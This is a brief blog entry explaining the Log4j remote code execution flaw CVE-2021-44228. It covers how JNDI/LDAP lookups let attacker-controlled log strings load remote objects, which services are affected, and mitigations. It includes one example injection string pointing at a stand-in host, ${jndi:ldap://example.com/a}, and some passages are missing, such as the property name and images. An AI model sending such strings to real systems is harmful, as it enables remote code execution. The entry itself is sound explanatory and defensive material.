Entry 2

Published: Dec 10th, 2021

Yesterday, a high severity vulnerabilityCVE-2021-44228 was discovered in the popular Java logging library log4jApache Log4j that could lead to remote code execution (RCE).

A few notes

The log4j package uses JNDIJava Naming and Directory Interface . It is a standard API for directory service that allows a Java program to find data (in the form of a Java object) through a directory.

A Java program can use JNDI and LDAP together to find a Java object containing data that it might need. For example, in the standard Java documentation there’s an example that talks to an LDAP server to retrieve attributes from an object. It uses the URL ldap://localhost:389/o=JNDITutorial to find the JNDITutorial object from an LDAP server running on the same machine (localhost) on port 389 and goes on to read attributes from it.

As the tutorial says “If your LDAP server is located on another machine or is using another port, then you need to edit the LDAP URL”. Thus the LDAP server could be running on a different machine and potentially anywhere on the Internet. That flexibility means that if an attacker could control the LDAP URL they’d be able to cause a Java program to load an object from a server under their control.

But in the case of log4j an attacker can control the LDAP URL by causing log4j to try to write a string like ${jndi:ldap://example.com/a}. If that happens then log4j will connect to the LDAP server at example.com and retrieve the object.

This happens because log4j contains special syntax in the form ${prefix:name} where prefix is one of a number of different Lookups where name should be evaluated. For example, ${java:version} is the current running version of Java.


Many services are vulnerable to this exploit. Cloud services like Amazon, Steam, Apple iCloud, Cloudflare, Twitter etc. and apps like Druid, Minecraft, ElasticSearch, Struts2, Solr have already been found to be vulnerable.

Ghidra’s vulnerable too:

And the gist of it comes down to:


  1. Upgrading to new version.

  2. If you can’t upgrade, set the property:

  • If none of the above works, you can remove the JndiLookup class from the classpath:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

This command will remove the class from the log4j-core.


The underlying truth behind impact is:

Dependency, from xkcd

Further Information